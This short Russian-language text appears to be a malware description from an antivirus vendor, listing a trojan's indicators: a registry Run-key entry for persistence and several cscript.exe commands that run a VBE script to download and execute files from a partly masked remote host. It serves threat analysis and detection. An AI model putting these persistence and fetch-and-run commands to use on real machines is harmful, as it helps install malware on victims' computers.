Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'USBRI0' = '%APPDATA%\a0zfo4czxsxm.exe'
- '<SYSTEM32>\cscript.exe' %APPDATA%\\a.vbe http://www.mo##.vai.la/ %APPDATA%\a0zfo4czxsxm.exe Exec
- '<SYSTEM32>\cscript.exe' %APPDATA%\\a.vbe http://www.mo##.vai.la/ %APPDATA%\ProtectionManagement_Uninstall.exename Down
- '<SYSTEM32>\cscript.exe' %APPDATA%\\a.vbe http://www.mo##.vai.la/ %APPDATA%\ConfigSecurityPolicy.exename Down
- %APPDATA%\a.vbe
- %APPDATA%\a.vbe